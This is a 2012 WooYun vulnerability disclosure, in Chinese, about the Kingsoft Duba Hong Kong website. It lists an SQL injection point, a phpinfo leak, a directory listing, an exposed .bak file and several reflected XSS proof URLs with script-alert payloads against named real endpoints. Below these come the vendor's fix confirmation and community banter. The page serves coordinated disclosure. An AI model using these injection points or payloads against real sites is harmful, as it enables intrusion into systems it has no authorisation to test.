当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09061

漏洞标题:金山毒霸官网严重高危安全漏洞(SQL注入、敏感信息泄漏、XSS攻击、文件目录遍历、网站页面备份文件游览)

相关厂商:金山毒霸

漏洞作者: 小蝎

提交时间:2012-06-30 12:33

修复时间:2012-08-14 12:33

公开时间:2012-08-14 12:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-30: 细节已通知厂商并且等待厂商处理中
2012-06-30: 厂商已经确认,细节仅向厂商公开
2012-07-10: 细节向核心白帽子及相关领域专家公开
2012-07-20: 细节向普通白帽子公开
2012-07-30: 细节向实习白帽子公开
2012-08-14: 细节向公众公开

简要描述:

金山毒霸香港官网严重高危安全漏洞(SQL注入、敏感信息泄漏、XSS攻击、文件目录遍历、网站页面备份文件游览)...

详细说明:

金山毒霸香港官网严重高危安全漏洞(SQL注入、敏感信息泄漏、XSS攻击、文件目录遍历、网站页面备份文件游览)...

漏洞证明:

1、SQL注入漏洞:
漏洞点:http://www.duba.com.hk:80/support_3_view.php?id=5






2、一些敏感后台URL:


3、敏感信息泄漏:duba.hk.phpinfo.htm




4、文件目录遍历:


5、XSS跨站脚本攻击:
http://www.duba.com.hk:80/purchase_content.php?type=B"><script>alert(42873);</sCript>
http://www.duba.com.hk:80/reg_ok.php?act=add&abc=17437&tel=88888&email=hacker@hacker.org&re_email=hacker@hacker.org&sale_company=nosec&buy_date=2012-06-30&user_type=0&soft_level=0&submit_button=88888&snid=12345<script>alert(42873)</script>
http://www.duba.com.hk:80/reg_ok.php?act=add&abc=17437&snid=12345&tel=88888&re_email=hacker@hacker.org&sale_company=nosec&buy_date=2012-06-30&user_type=0&soft_level=0&submit_button=88888&email=hacker@hacker.org<script>alert(42873)</script>
http://www.duba.com.hk:80/reg_ok.php?act=add&abc=17437&snid=12345&tel=88888&email=hacker@hacker.org&re_email=hacker@hacker.org&buy_date=2012-06-30&user_type=0&soft_level=0&submit_button=88888&sale_company=nosec<script>alert(42873)</script>
http://www.duba.com.hk:80/faq.php?cid=1"><script>alert(42873);</sCript>
http://www.duba.com.hk:80/support_1.php?cid=1"><script>alert(42873);</sCript>
http://www.duba.com.hk:80/support_3_view.php?id=5<script>alert(42873);</sCript>
6、网站页面文件备份游览:
http://www.duba.com.hk:80/index.php.bak

修复方案:

你们懂的啦。

版权声明:转载请注明来源 小蝎@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-06-30 18:59

厂商回复:

谢谢,我们会尽快处理

最新状态:

2012-07-10:目前漏洞已经修补完毕;同时也欢迎广大安全朋友们继续反馈金山集团及各子公司的安全问题,我们将尽快对反馈内容进行确认和处理,减少和降低对用户的影响。为表示感谢,金山将根据漏洞数量、严重程度以及影响范围赠送N份来自金山的纪念礼品。为减少中间流程环节,可直接联系qq964894或chengchong@ijinshan.com;

漏洞评价:

评论

  1. 2012-06-30 13:07 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    标题要长。。。。。。

  2. 2012-06-30 13:20 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    文学青年 哈哈

  3. 2012-06-30 13:35 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    。。。。。。。。。。。。

  4. 2012-06-30 13:42 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    “。”什么意思啊? :-)

  5. 2012-06-30 13:44 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    哈哈,标题长才受关注。。。

  6. 2012-06-30 13:51 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    哈哈 前辈们 偶是无意的写的那么长 ^_^

  7. 2012-06-30 13:57 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    这要是360的话,洞主这次就赚大了啊

  8. 2012-06-30 17:18 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    希望大伙给点分吧 嘻嘻

  9. 2012-06-30 19:11 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    看着标题我想到了JSKY

  10. 2012-06-30 20:28 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    XSS的时候使用了JSKY

  11. 2012-06-30 22:57 | GuoKer(ZhuLiu) ( 普通白帽子 | Rank:168 漏洞数:21 | 在校学生党的路过 霸气侧漏)

    嘿嘿JSKY.....

  12. 2012-07-01 01:26 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    这就20了!!!20啊!!一辈子就得过一次20!

  13. 2012-07-01 10:10 | Master ( 路人 | Rank:29 漏洞数:10 )

    @顺子 还没得过20 呢

  14. 2012-07-01 16:49 | 随风.潜入夜 ( 路人 | Rank:22 漏洞数:5 )

    @顺子 F4ck的顺子?

  15. 2012-07-01 17:08 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    @随风.潜入夜 爷,再赏几个金币呗!

  16. 2012-07-01 19:12 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @顺子 有过一次精华,翻倍得了个30、、

  17. 2012-07-01 19:21 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    @px1624 T-T羡慕!

  18. 2012-07-01 20:16 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    这个漏洞不敢再继续深入渗透了(内网的终极梦想),咱们只是进行安全评估,道德的界限……

  19. 2012-07-01 21:52 | 随风.潜入夜 ( 路人 | Rank:22 漏洞数:5 )

    @顺子 尼玛,还真是你。F4CK~

  20. 2012-07-01 21:53 | 随风.潜入夜 ( 路人 | Rank:22 漏洞数:5 )

    @顺子 我另一个ID一个洞得了40个RANK,哈哈。

  21. 2012-07-01 21:59 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    - +!!! 改天给个更变态的漏洞 要个60 哈哈。。。

  22. 2012-07-01 22:37 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @小蝎 20貌似是最高了,精华会翻倍

  23. 2012-07-01 23:31 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    @随风.潜入夜 真是我,不好意思啊! 求40RANK

  24. 2012-07-11 00:31 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    金山哥送什么礼物呢?

  25. 2012-07-11 08:57 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    我在想,金山或者很多公司都用qq号,那360公司呢?

  26. 2012-07-11 11:40 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @Hxai11 我猜360口信

  27. 2012-07-11 11:44 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    @水滴 这个叼。。

  28. 2012-07-27 09:47 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    把360的挖掘出来,那才叫叼!

  29. 2012-07-31 15:18 | Night ( 实习白帽子 | Rank:57 漏洞数:16 )

    额.. 给金山来了一个摸底

  30. 2012-07-31 17:02 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    我到希望金山颁发一个信息安全证书。

  31. 2012-08-01 19:47 | kookxiang ( 路人 | Rank:28 漏洞数:6 | 苦逼PHP程序猿…)

    @小蝎 那个目录遍历是apache貌似都有吧,apache自动生成的,用于显示文件图标的 = =

  32. 2012-08-01 21:23 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    但也是由于配置错误导致啊。

  33. 2012-08-11 22:54 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    @顺子 顺子兄 你Q号多少 。

  34. 2012-08-12 05:06 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    有其他提交过金山漏洞的白帽子们收到了礼物吗。。。

  35. 2012-08-12 15:17 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    @小蝎 你把你Q私信发我吧·